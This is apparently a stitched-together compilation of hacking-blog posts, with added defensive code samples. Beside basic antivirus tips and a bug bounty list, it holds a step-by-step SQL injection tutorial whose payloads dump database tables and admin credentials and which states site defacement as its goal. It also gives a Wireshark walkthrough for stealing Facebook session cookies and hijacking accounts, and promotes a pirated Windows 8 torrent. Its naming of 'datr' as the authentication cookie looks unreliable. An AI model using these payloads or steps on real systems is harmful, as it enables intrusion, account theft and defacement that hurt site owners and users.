How to protect your PC from RATs , Trojans , Keyloggers and virus

Is your PC safe from keyloggers, RATs, Trojans and viruses? Nowadays most PCs are infected by viruses and Trojans. It all happens due to a lack of security in the system. Your computer should be protected from these kinds of Trojan horses. They corrupt your system memory and can delete all personal data from the system. Now let us see how to be protected from all these kinds of Trojans. First we will understand what they are, then how to be protected from them.



RATs (Remote Administrative Tools): a RAT is a kind of Trojan horse which helps the attacker control the victim PC remotely. It is one of the most dangerous Trojans. What it can do depends on the RAT's features and functions. Most RATs can capture or record the victim's screen and can even record keystrokes. It is mostly used for hacking the remote PC. The most common RATs are Dark Comet, Nuclear RAT, Poison Ivy, etc.
How to protect the PC from RATs:
The best way to protect the PC from RATs is to install the best and updated antivirus (from my side, Bit Defender 2012).
Don't download anything unless you think it is useful software, because RATs are mostly sent through files.
Scan files before opening them.
Always keep the antivirus up to date.



Trojan horse: These are the same as RATs; they give full access to the remote PC. They make multiple copies of themselves. They can steal data. If one is installed on the remote PC, the attacker has full access to it and can steal useful information from the victim PC.

You can protect your PC from Trojan horses by installing a good and updated antivirus.


Keyloggers: Keylogging is the method of stealing the key logs from the victim PC by installing the Trojan on the remote PC. It is mostly used for hacking email accounts. The most used keyloggers are Refog Keylogger, Rin Logger, Emissary Keylogger, etc.
Steps to protect your PC from keyloggers:
A good and updated antivirus.
Install an anti-keylogger such as Zemana.
The conclusion is that the best way to protect yourself is a good antivirus, which from my side is Bit Defender 2012. With this you can protect your PC from viruses, Trojans and keyloggers.
I hope that this post was helpful for you all, and don't forget to share it.


SQL Injection for NOObs

SQL Injection

Hi, this thread covers all your basic SQL Injection needs. After reading this, you should be able to successfully retrieve Database information such as the username and password that are crucial for defacing sites.

Let's start.

What is SQL Injection?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
Source
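
The two causes named in that definition (input pasted into the SQL text, and input that is not strongly typed), shown as a vulnerable lookup beside its hardened form. This is an added example, not code from the original post: it uses Python's sqlite3 as a stand-in for the PHP/MySQL page in the tutorial, and the tables, rows and function names are constructed.

```python
import sqlite3

def make_db():
    """Constructed in-memory database standing in for the site's backend."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (username TEXT, pass TEXT);
        INSERT INTO articles VALUES (232, 'Welcome');
        INSERT INTO admin VALUES ('MyName', 'constructed-hash');
    """)
    return db

def get_titles_vulnerable(db, raw_id):
    # BAD: the request parameter is pasted into the SQL text, so whatever
    # follows the number is parsed as SQL instead of being treated as data.
    query = "SELECT title FROM articles WHERE id = " + raw_id
    return [row[0] for row in db.execute(query)]

def get_titles_safe(db, raw_id):
    # GOOD, part 1: strong typing. An id must be a plain decimal integer.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a positive integer")
    # GOOD, part 2: bound parameter. The value travels separately from the
    # statement, so it can never change the structure of the query.
    cur = db.execute("SELECT title FROM articles WHERE id = ?", (int(raw_id),))
    return [row[0] for row in cur]

def demo():
    """Run the same request value through both versions."""
    db = make_db()
    injected = "-232 UNION SELECT pass FROM admin--"  # shape used in the tutorial
    leaked = get_titles_vulnerable(db, injected)
    try:
        get_titles_safe(db, injected)
        rejected = False
    except ValueError:
        rejected = True
    return get_titles_safe(db, "232"), leaked, rejected

if __name__ == "__main__":
    print(demo())
```

The quote test in Step 1 only surfaces this bug when the database error is echoed to the visitor; the parameterized version is what removes it.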

Step 1: Choose Your Target:
Of course, you can't SQL Inject nothing. You must have a website as a target. Remember, only vulnerable sites are able to be injected into. You can't just SQL Inject any site *sigh*.

So how do we see which sites are vulnerable? There are many lists of vulnerable sites out there. But if you wish to find them manually, read on.
Dorks
Wtf is this? These are "Dorks" that you can use to find vulnerable sites. Go to Google and simply copy and paste one of those dorks and click search.

I personally recommend going here (scanner seems to be down) to see which sites are vulnerable, but if you wish to do THAT manually also, read on. If not, skip to Step 2.

After you have Googled the dorks, click on any site.

To check the site for vulnerability, simply add a "'" to the end of the URL (without the quotes). It should look somewhat like this:

Code:
http://www.sitename.com/main.php?id=232'

If the page simply refreshes, the site is not vulnerable. But if an error of any kind pops up, the site is prone to SQLi. When you have successfully found a vulnerable site, proceed to Step 2.

Step 2: Find the Vulnerable Column
Now that we found our vulnerable site, we will need to find the vulnerable columns.

Add this to the end of the URL:

Code:
http://www.sitename.com/main.php?id=232 order by 1--

Now here's where it gets tougher (not really). You have to look for errors as you enter new numbers. For example:

Code:
http://www.sitename.com/main.php?id=232 order by 1-- (no error)
http://www.sitename.com/main.php?id=232 order by 2-- (no error)
http://www.sitename.com/main.php?id=232 order by 10-- (ERROR!)
http://www.sitename.com/main.php?id=232 order by 5-- (no error)
http://www.sitename.com/main.php?id=232 order by 6-- (ERROR!)

The goal here is to find the lowest column number that shows the error. As you can see in the example, the lowest column that we found an error on is column 6; therefore, column 6 doesn't exist and there are only 5 columns.

Now we have to find which one of these five columns (it may be different in your case) is vulnerable, to do that, add this code to the end of the URL:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,4,5--

Make sure to include the - in the beginning and the -- at the end, this is crucial. Remember that the code above may be different in your case regarding how many columns there are.

Now, if you see numbers on the screen, you can proceed. The very first number is the number of the vulnerable column. If the number is "4", that means that the 4th column is the vulnerable column.

Step 3: Obtain Version Number and Database Name
That vulnerable column is the ONLY column that we will be editing.

Assuming that the vulnerable column is 4 (it may be different in your case), proceed to find the version number. To find the version number, replace the vulnerable column with "@@version" like this:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,@@version,5--

If the version is 5 or above, proceed. If not, it will be harder to hack. There are other tutorials covering how to hack database versions 4 or lower.

Now we must find the database name. To do this, replace the "@@version" from before with "concat(database())" like this:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,concat(database()),5--

And BOOM! The database name should appear on your screen. Copy this somewhere safe, we will need this for later.
Step 4: Obtain Table Names

We are almost done, don't give up just yet.

Now we have to find the table names. This is crucial because the tables contain all of the information that we may need. Some hackers look for credit card information and e-mail addresses, but in this tutorial we will be looking to retrieve the username and password in order to deface the site.

Edit the code as follows:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()--

Now, names appear. Look for obvious names hinting at tables where user information can be stored. You are looking for table names such as "Admin", "Users", "Members", "Admin_Id", "Admin_pass", "User_id", etc.

The last character is chopped off? Don't worry. Count how many tables you can see, then add this code based on the tables that you can see. We will be assuming that the last table you can see is the 8th table.

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,table_name,5 from information_schema.tables where table_schema=database() limit 8,1--

This code is to view the 9th table. Replace the 8 with a 9 to view the 10th table, and so on until you find the table that you think has the most crucial information.

When you find the table, copy the name somewhere safe. We will need both the database and table names for the next step.

For this tutorial, we will be using the table name of "admin".
Step 5: View the Columns, and Find the Crucial Shit
Here comes the fun part :3

To find the column names, add this to the end of the URL:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name="admin"--

Didju get an error? OH NO! YOU FAIL. Choose another site. Just kidding.
Go here and type in your table name where it says "Say Hello to My Little Friend".

In my case, this is the string that I got after I inputted "admin" to the input space:

Code:
61646d696e

Now, replace the table name with hex as so:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name=0x61646d696e--

Notice how I added the "0x", that is to indicate that hex is being used. Remember to get rid of the quotes.

Now after you enter this code, you should see where all the juicy information is contained. An example of what you should see is:

Code:
Admin_Username, Admin_Pass, Admin_credentials, User_credentials, Members, etc..

Now say you want to view what is in the "Admin_Username" and the "Admin_pass", add this code (in this example we will be using "database" as the database name and "admin" for the table name):

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(Admin_Username,0x3a,Admin_Pass) ,5 FROM database.admin--

The "0x3a" will put a colon to where the information will be separated. You should get something like this:

Code:
1:MyName:e10adc3949ba59abbe56e057f20f883e

The username is "MyName" and the password is.. WAIT! That is MD5, crack this using Havij. Download Havij here.

Now, as you can see, this is the login info:

Code:
Username: MyName
Pass: 123456
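
The hash shown above is a single unsalted MD5 of a common password, which is why it maps straight back to `123456`. As an added example (not from the original post), the code below contrasts that storage scheme with a salted, iterated PBKDF2 record using only Python's standard library; the function names, the record format and the iteration count are assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # assumed work factor; raise it as far as login latency allows

def md5_record(password):
    # WEAK: no salt and one fast round. Equal passwords always give equal
    # hashes, so a single precomputed table covers every user and every site.
    return hashlib.md5(password.encode()).hexdigest()

def pbkdf2_record(password, salt=None):
    # BETTER: a random per-user salt plus a deliberately slow derivation.
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"

def pbkdf2_verify(password, record):
    # Re-derive with the stored salt and iteration count, then compare in
    # constant time so the check does not leak how many characters matched.
    scheme, iters, salt_hex, dk_hex = record.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    print(md5_record("123456"))                 # same value for every user
    first, second = pbkdf2_record("123456"), pbkdf2_record("123456")
    print(first != second, pbkdf2_verify("123456", first))
```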

Now all you have to do is find the admin page, which is usually
Code:
http://www.sitename.com/admin
http://www.sitename.com/adminlogin
http://www.sitename.com/admin_login
http://www.sitename.com/login
or something similar. There are tools online that will find you the admin page.
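
Seen from the server, every request in Steps 1 to 5 leaves a recognisable line in the web access log. The detector below is an added example, not part of the original post: it matches the request shapes shown in this tutorial against constructed log lines, and the rule names, log format and threshold are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Markers taken from the request shapes shown in steps 1-5 of the tutorial.
RULES = [
    ("quote_probe", re.compile(r"=[^&\s]*'\s*$")),
    ("order_by_scan", re.compile(r"\border\s+by\s+\d+\s*--", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_dump", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    ("fingerprint", re.compile(r"@@version|\bdatabase\(\)", re.I)),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges, invented sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /main.php?id=232 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/Oct/2012:13:56:01 +0000] "GET /main.php?id=232%27 HTTP/1.1" 500 310',
    '198.51.100.9 - - [10/Oct/2012:13:56:09 +0000] "GET /main.php?id=232%20order%20by%206-- HTTP/1.1" 500 310',
    '198.51.100.9 - - [10/Oct/2012:13:56:30 +0000] "GET /main.php?id=-232+union+select+1,2,3,@@version,5-- HTTP/1.1" 200 5300',
]

def classify(log_line):
    """Return (client_ip, [matched rule names]) for one log line, or None."""
    m = REQUEST.match(log_line)
    if not m:
        return None
    ip, target = m.groups()
    query = unquote_plus(target.partition("?")[2])  # decode %20, + and %27
    return ip, [name for name, rx in RULES if rx.search(query)]

def suspicious_clients(lines, min_rules=2):
    """Clients whose requests matched at least min_rules distinct rules."""
    seen = {}
    for line in lines:
        result = classify(line)
        if result and result[1]:
            seen.setdefault(result[0], set()).update(result[1])
    return {ip: sorted(rules) for ip, rules in seen.items() if len(rules) >= min_rules}

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG))
```

A single match can be a harmless typo or a search term, which is why the report is keyed on one client hitting several distinct rules.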


Facebook Cookie Stealing And Session Hijacking

The cookie which Facebook uses to authenticate its users is called "datr". If an attacker can get hold of your authentication cookies, all he needs to do is inject those cookies into his browser and he will gain access to your account. This is what a Facebook authentication cookie looks like:

{ Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc; }


How To Steal Facebook Session Cookies And Hijack An Account? 

An attacker can use a variety of methods to steal your Facebook authentication cookies, depending upon the network he is on. If an attacker is on a hub-based network, he would just sniff traffic with any packet sniffer and gain access to the victim's account.

If an attacker is on a switch-based network, he would use an ARP poisoning request to capture authentication cookies. If an attacker is on a wireless network, he just needs to use a simple tool called Firesheep to capture the authentication cookie and gain access to the victim's account.

In the example below I will be explaining how an attacker can capture your authentication cookies and hack your Facebook account with Wireshark.

Step 1 - First of all, download Wireshark from the official website and install it.

Step 2 - Next, open up Wireshark, click on Analyze and then click on Interfaces.

Step 3 - Next, choose the appropriate interface and click on Start.

Step 4 - Continue sniffing for around 10 minutes.

Step 5 - After 10 minutes, stop the packet sniffing by going to the Capture menu and clicking on Stop.

Step 6 - Next, set the filter to http.cookie contains "datr" at top left. This filter will search for all the HTTP cookies with the name datr, and datr, as we know, is the name of the Facebook authentication cookie.

Step 7 - Next, right click on it and go to Copy – Bytes – Printable Text only.

Step 8 - Next you'll want to open up Firefox. You'll need both Greasemonkey and the cookieinjector script. Now open up Facebook.com and make sure that you are not logged in.

Step 9 - Press Alt C to bring up the cookie injector, and simply paste the cookie value into it.

Step 10 - Now refresh your page and voilà, you are logged in to the victim's Facebook account.

Note: This attack will only work if the victim is on an http:// connection, and even on https:// if end-to-end encryption is not enabled.

Countermeasures

The best way to protect yourself against a session hijacking attack is to use an https:// connection each and every time you log in to your Facebook, Gmail, Hotmail or any other email account. Your cookies would then be encrypted, so even if an attacker manages to capture your session cookies he won't be able to do anything with them.
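
The same countermeasure from the site operator's side, as an added example that is not part of the original post: a session cookie only stays off plain http:// if the server marks it Secure and tells the browser to keep using HTTPS. The checker below audits one response's headers for that; the function name and the sample headers are constructed, and only the cookie name comes from the article.

```python
from http.cookies import SimpleCookie

def audit_response(headers, session_names):
    """headers: (name, value) pairs from one HTTPS response.
    Returns findings about the cookies listed in session_names."""
    findings = []
    # Without HSTS a browser may still be steered to http:// on a later visit.
    if not any(name.lower() == "strict-transport-security" for name, _ in headers):
        findings.append("response: no Strict-Transport-Security header")
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        jar = SimpleCookie()
        jar.load(value)
        for cookie_name, morsel in jar.items():
            if cookie_name not in session_names:
                continue
            if not morsel["secure"]:
                # The browser will attach this cookie to cleartext requests,
                # which is exactly what the capture filter above relies on.
                findings.append(f"{cookie_name}: missing Secure")
            if not morsel["httponly"]:
                findings.append(f"{cookie_name}: missing HttpOnly")
    return findings

# Constructed sample responses; the cookie values are placeholders.
WEAK = [("Set-Cookie", "datr=constructed-value; Path=/")]
HARDENED = [
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "datr=constructed-value; Path=/; Secure; HttpOnly"),
]

if __name__ == "__main__":
    print(audit_response(WEAK, {"datr"}))
    print(audit_response(HARDENED, {"datr"}))
```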


Free Download Microsoft Windows 8

Well, we all know that Microsoft has very recently released one of the year's most awaited operating systems, Windows 8. Previously Microsoft released a developer version for pre-release testing. Now it has been released all over the globe.



Microsoft has officially set its price tag at $39.99, which will be valid till Jan 2013. That is a cheap price if you want to buy this Microsoft product.


Microsoft is also currently running a special promotion up to 31st of January 2013, under which you can upgrade to Windows 8 Pro Edition for a very small amount. If you have purchased or are going to purchase a personal computer which is pre-loaded with a genuine version of Windows 7 (any edition), then you are eligible to get the Windows 8 Upgrade (Pro Edition) for $14.99 (US Dollar) or £14.99 (British Pounds) or €14,99 (Euros) or INR 699 (Indian Rupees).
Now, I am interested in something that is known as free. Yes, you can get Microsoft Windows 8 from the link below. So why wait? Just download it through the torrent link given below, which has a huge number of seeds, and enjoy Windows 8 on your PC.



List of Bug Bounty Programs

Bug Bounty Websites for Web Application Vulnerability 

Mozilla
http://www.mozilla.org/security
http://www.mozilla.org/projects/security/security-bugs-policy.html
http://www.mozilla.org/security/announce

Google
https://www.google.com/appserve/security-bugs/new?rl=xkp7zert49a5q6owod28bhr2

Facebook
http://www.facebook.com/whitehat/bounty

Paypal
https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=security/reporting_security_issues

Etsy
http://www.etsy.com

Wordpress
http://www.whitefirdesign.com/about/wordpress-security-bug-bounty-program.html

Commonsware
http://commonsware.com/bounty.html

CCBill
http://www.ccbill.com/developers/security/vulnerability-reward-program.php
http://www.ccbill.com/developers/security/rewards.php

Vark
http://www.vark.com

Windthorstisd
http://www.windthorstisd.net/BugReport.cfm


Bug Bounty Websites for Products Vulnerability 

Mozilla
http://www.mozilla.org/security
http://www.mozilla.org/security/known-vulnerabilities/firefox.html

Google Chrome
http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program

Zero Day Initiative
http://www.zerodayinitiative.com

Barracuda
http://www.barracudalabs.com/bugbounty

Artifex Software
http://www.ghostscript.com/Bug_bounty_program.html

Hex Rays
http://www.hex-rays.com/bugbounty.shtml

Ardour
http://ardour.org/bugbounty

Piwik
http://piwik.org/security


Hall of Fame Websites(No Bounties)

Microsoft
http://technet.microsoft.com/en-us/security/ff852094.aspx
http://technet.microsoft.com/en-us/security/cc308589
http://technet.microsoft.com/en-us/security/cc308575
http://technet.microsoft.com/en-us/security/cc261624
http://www.microsoft.com/security/msrc/default.aspx

Apple
http://support.apple.com/kb/HT1318

Adobe
http://www.adobe.com/support/security/bulletins/securityacknowledgments.html
http://www.adobe.com/support/security/alertus.html

IBM
http://www-03.ibm.com/security/secure-engineering/report.html

Twitter
https://twitter.com/about/security
http://support.twitter.com/groups/33-report-abuse-or-policy-violations/topics/122-reporting-violations/articles/477159-how-to-report-xss-api-and-other-security-vulnerabilities#
https://support.twitter.com/forms

Dropbox
security@dropbox.com
https://www.dropbox.com/security
https://www.dropbox.com/special_thanks

Cisco
http://tools.cisco.com/security/center/home.x#~alerts

Moodle
http://moodle.org/security

Drupal
http://drupal.org/security-team

Oracle
http://www.oracle.com/us/support/assurance/reporting/index.html

Symantec
http://www.symantec.com/security

Ebay
http://pages.ebay.com/securitycenter/Researchers.html

Twilio
http://www.twilio.com/blog/2012/03/reporting-security-vulnerabilities.html

37 Signals
http://37signals.com/security-response

Salesforce
http://www.salesforce.com/company/privacy/disclosure.jsp

Reddit
http://code.reddit.com/wiki/help/whitehat

Github
http://help.github.com/responsible-disclosure/

Ifixit
http://www.ifixit.com/Info/responsible_disclosure

Constant Contact
http://www.constantcontact.com/about-constant-contact/security/report-vulnerability.jsp

Zeggio
http://www.zeggio.com

Simplify
http://simplify-llc.com/simplify-security.html

Team Unify
http://www.teamunify.com/__corp__/security.php

Skoodat
http://www.skoodat.com/Security

Relaso
http://relaso.com/disclosure

Moduscsr
http://www.moduscsr.com/security_statement.php

Cloudnetz
http://cloudnetz.com/Legal/vulnerability-testing-policy.html

Emptrust
http://www.emptrust.com/Security.aspx

Apriva
http://www.apriva.com/security

Amazon
http://aws.amazon.com/security/vulnerability-reporting

SquareUp
https://squareup.com/security/levels

G-Sec
http://www.g-sec.lu/responsible.disclosure.policy.html

Xen
http://www.xen.org/projects/security_vulnerability_process.html
